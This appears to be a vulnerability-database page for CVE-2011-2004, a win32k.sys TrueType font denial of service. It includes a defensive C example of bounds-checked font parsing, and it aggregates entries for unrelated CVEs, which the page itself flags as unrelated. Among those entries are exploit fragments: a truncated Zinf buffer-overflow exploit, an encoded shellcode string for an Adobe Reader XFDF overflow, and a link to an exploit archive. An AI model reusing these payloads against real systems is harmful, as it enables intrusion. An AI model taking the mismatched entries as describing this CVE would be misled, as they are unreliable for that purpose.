CVE-2011-2004
Published 2011-11-08
Priority P3 38 · CVSS 2.0 7.1 (High) · Vector AV:N/AC:M/Au:N/C:N/I:N/A:C
EPSS 24.62% (97.6th percentile)
Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402.
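The description names the bug class, an array index taken from attacker-controlled TrueType data and used without an adequate check, but neither it nor anything else on this page says which field or table is involved, and the example below does not pretend to. It is an added illustration, not Microsoft's code and not a reproduction of the win32k.sys flaw: a small sfnt table-directory and glyph-lookup parser in C that shows the three checks a font parser needs so that a count, offset or glyph index read from the file can never index outside the buffer. It assumes the short 'loca' format (long format and 'head'.indexToLocFormat are left out), and it constructs its own 92-byte sample font in memory; the sample, the function names and the tampering steps are all this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* sfnt/TrueType structures are big-endian. */
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v;
}

/* Find a table in the sfnt directory. numTables, offset and length all come
 * from the file, so each is checked against the real buffer size before use.
 * Returns 0 and sets *off/*tlen on success, -1 on any inconsistency. */
int ttf_find_table(const uint8_t *font, size_t len, const char tag[4],
                   size_t *off, size_t *tlen)
{
    if (len < 12) return -1;                            /* offset table header */
    uint16_t num_tables = be16(font + 4);
    if ((size_t)num_tables * 16 > len - 12) return -1;  /* directory must fit in file */
    for (size_t i = 0; i < num_tables; i++) {
        const uint8_t *rec = font + 12 + i * 16;        /* tag, checksum, offset, length */
        if (memcmp(rec, tag, 4) != 0) continue;
        uint32_t o = be32(rec + 8), l = be32(rec + 12);
        if (o > len || l > len - o) return -1;          /* never compute o + l: it can wrap */
        *off = o; *tlen = l;
        return 0;
    }
    return -1;
}

/* Map a glyph index to its byte range in 'glyf' via 'maxp'.numGlyphs and a
 * short-format 'loca' (uint16 offsets in units of 2 bytes). Checks (a)-(c)
 * are what keep an attacker-chosen index inside the arrays. */
int ttf_glyph_range(const uint8_t *font, size_t len, unsigned glyph,
                    size_t *gstart, size_t *glen)
{
    size_t maxp_off, maxp_len, loca_off, loca_len, glyf_off, glyf_len;
    if (ttf_find_table(font, len, "maxp", &maxp_off, &maxp_len) || maxp_len < 6) return -1;
    if (ttf_find_table(font, len, "loca", &loca_off, &loca_len)) return -1;
    if (ttf_find_table(font, len, "glyf", &glyf_off, &glyf_len)) return -1;
    uint16_t num_glyphs = be16(font + maxp_off + 4);
    if (glyph >= num_glyphs) return -1;                        /* (a) index < declared count */
    if (loca_len < ((size_t)num_glyphs + 1) * 2) return -1;    /* (b) loca really holds count+1 entries */
    size_t s = (size_t)be16(font + loca_off + (size_t)glyph * 2) * 2;
    size_t e = (size_t)be16(font + loca_off + (size_t)glyph * 2 + 2) * 2;
    if (e < s || e > glyf_len) return -1;                      /* (c) glyph range inside glyf */
    *gstart = glyf_off + s;
    *glen = e - s;
    return 0;
}

/* Constructed sample (not a real font): 3 tables, 2 glyphs, loca = {0,5,10},
 * so glyph 0 is glyf[0,10) and glyph 1 is glyf[10,20). 92 bytes in total. */
#define SAMPLE_LEN 92
size_t build_sample_font(uint8_t *f, size_t cap)
{
    static const char *tags[3] = { "maxp", "loca", "glyf" };
    static const uint32_t offs[3] = { 60, 66, 72 }, lens[3] = { 6, 6, 20 };
    if (cap < SAMPLE_LEN) return 0;
    memset(f, 0, SAMPLE_LEN);
    put32(f, 0x00010000);                  /* sfnt version 1.0 */
    put16(f + 4, 3);                       /* numTables */
    for (int i = 0; i < 3; i++) {
        uint8_t *rec = f + 12 + i * 16;
        memcpy(rec, tags[i], 4);
        put32(rec + 8, offs[i]);
        put32(rec + 12, lens[i]);
    }
    put32(f + 60, 0x00005000);             /* maxp version 0.5 */
    put16(f + 64, 2);                      /* numGlyphs */
    put16(f + 66, 0); put16(f + 68, 5); put16(f + 70, 10);   /* loca entries */
    return SAMPLE_LEN;
}

/* Runs the parser over the sample and two tampered copies of it; returns the
 * number of cases that behaved as intended (4 when all do). */
int run_checks(void)
{
    uint8_t f[SAMPLE_LEN];
    size_t n = build_sample_font(f, sizeof f), s = 0, l = 0;
    int ok = 0;
    ok += ttf_glyph_range(f, n, 1, &s, &l) == 0 && s == 82 && l == 10;  /* well-formed */
    ok += ttf_glyph_range(f, n, 2, &s, &l) != 0;                        /* index == numGlyphs */
    put16(f + 64, 200);                                  /* claim 200 glyphs, loca unchanged */
    ok += ttf_glyph_range(f, n, 50, &s, &l) != 0;        /* passes (a), caught by (b) */
    put16(f + 64, 2); put16(f + 70, 100);                /* glyph 1 end offset past glyf */
    ok += ttf_glyph_range(f, n, 1, &s, &l) != 0;         /* caught by (c) */
    return ok;
}

int main(void)
{
    printf("%d/4 checks passed\n", run_checks());
    return 0;
}
```

Check (b) is the one that matters when a count is inflated: (a) alone trusts a number the attacker wrote, which is exactly how an "array index error" survives a parser that appears to validate its indices. In a kernel-mode font engine such as win32k.sys the out-of-range read happens in ring 0, which is why the outcome recorded on this page is a reboot rather than an application crash.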
Affected
1 range listed in the CPE data; the description above also names Windows 7 Gold and SP1 and Windows Server 2008 R2 / R2 SP1, so treat the table as incomplete. The fix is the Microsoft bulletin MS11-084 linked under References.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.1 | HIGH | AV:N/AC:M/Au:N/C:N/I:N/A:C |
| vendor_redhat | — | 5.0 | MEDIUM | — |
The vendor_redhat row matches the Red Hat entry for CVE-2011-2501 further down this page; it is not a Red Hat rating of CVE-2011-2004.
GHSA
GHSA-mfgm-v8rv-75rw: Array index error in win32k
ghsa_unreviewed · 2022-05-13 · CVSS 8.8 · CWE-20 · CVE-2011-2004 [HIGH]
Description: identical to the NVD text above. The 8.8 is the unreviewed advisory's own score, not the NVD figure.
Red Hat
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+
vendor_redhat · 2011-06-07 · CVSS 5.0
Note: this and the remaining Red Hat, Exploit-DB and Bugzilla entries below concern other CVEs whose identifiers, versions or titles contain "2004"; none of them describes CVE-2011-2004.
The png_format_buffer function in pngerror.c in libpng 1.0.x before 1.0.55, 1.2.x before 1.2.45, 1.4.x before 1.4.8, and 1.5.x before 1.5.4 allows remote attackers to cause a denial of service (application crash) via a crafted PNG image that triggers an out-of-bounds read during the copying of error-message data. NOTE: this vulnerability exists because of a CVE-2004-0421 regression. NOTE: this is called an off-by-one error by some sources.
No detection rules found.
Exploit-DB
CVE-2011-3486 Beckhoff TwinCAT 2.11.0.2004 - Denial of Service
exploitdb · 2011-09-14
---
#######################################################################
Luigi Auriemma
Application: Beckhoff TwinCAT
http://www.beckhoff.de/twincat/
Versions: <= 2.11.0.2004
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
1) Introduction
From vendor's website:
"The Beckhoff TwinCAT software system turns almost any compatible PC
into a real-time controller with a multi-PLC system, NC axis control,
programming environment and operating station."
Exploit-DB
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
exploitdb · 2011-08-03
---
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tutorial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#
sys = `ver`
if sys =~/Windows/
system("cl
Exploit-DB
CVE-2004-0194 Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)
exploitdb · 2011-07-04
---
# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filetype ".xfdf"
# Date: 04/01/2011
# Author: [email protected] / http://extraexploit.blogspot.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html
.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRF
Exploit-DB
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb · 2011-04-11
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Bugzilla
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-6]
bugzilla · 2011-06-29 · CVSS 5.0
epel-6 tracking bug for libpng10: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
mingw32-libpng-1.2.37-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-3.el6
---
libpng10-1.0.54-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/libpng10-1.0.54-3.el6
---
Package mingw32-libpng-1.2.37-3.el6:
* should fix your issue,
* was pushed to the Fedora EPEL 6 testing repository,
* should be available at your local mirror within two days.
Bugzilla
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
bugzilla · 2011-06-29 · CVSS 5.0
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=717084
Please note: this issue affects multiple
Bugzilla
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-5]
bugzilla · 2011-06-29 · CVSS 5.0
epel-5 tracking bug for mingw32-libpng: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
mingw32-libpng-1.2.37-2.el5 has been submitted as an update for Fedora EPEL 5.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-2.el5
---
mingw32-libpng-1.2.37-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-3.el6
---
Package mingw32-libpng-1.2.37-2.el5:
* should fix your issue,
* was pushed to the Fedora EPEL 5 testing repository,
* should be available at your local mirro
Bugzilla
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+
bugzilla · 2011-06-27 · CVSS 5.0
It was reported [1] that the fix for CVE-2004-0421 in libpng was inadvertently reverted during the 1.2.23 development cycle. The original flaw could be used to cause a denial of service via a carefully-crafted PNG image.
This would affect all versions of libpng >=1.2.23, including 1.4.x and 1.5.x.
[1] http://sourceforge.net/mailarchive/forum.php?thread_name=BANLkTikrnU6FJNQYFvwmt78hwpgKPVRd1Q%40mail.gmail.com&forum_name=png-mng-implement
Discussion:
Upstream fix is here:
http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng;a=commitdiff;h=65e6d5a34f49acdb362a0625a706c6b914e670af
---
This has been assigned CVE-2011-2501:
http://www.openwall.com/lists/oss-security/2011/06/28/16
---
Created libpng tracking bugs
Bugzilla
CVE-2004-2680 [MEDIUM] mod_python arbitrary data disclosure flaw
bugzilla · 2007-12-20 · CVSS 5.0
------- Comment From [email protected] 2011-01-31 15:05 EDT-------
Did this make it into 4.9?
------- Comment From [email protected] 2011-02-17 17:27 EDT-------
Since I don't see an updated mod_python package on RHN in the RHEL 4 beta channel, I don't expect this made 4.9 after all. The original submitter seems to have left IBM somewhere along the four years this bug was around though I am sure we can probably find someone else to verify the fix if there is one. For the moment, I am closing this as WILL_NOT_FIX. Thanks.
Discussion:
Hello,
This is currently in accepted state for RHEL 4.9.
Thank You
Joe Kachuck
---
(In reply to comment #12)
> This is currently in accepted state for RHEL 4.9.
This bug is *proposed* for
References
http://www.kb.cert.org/vuls/id/675073
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-084
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14133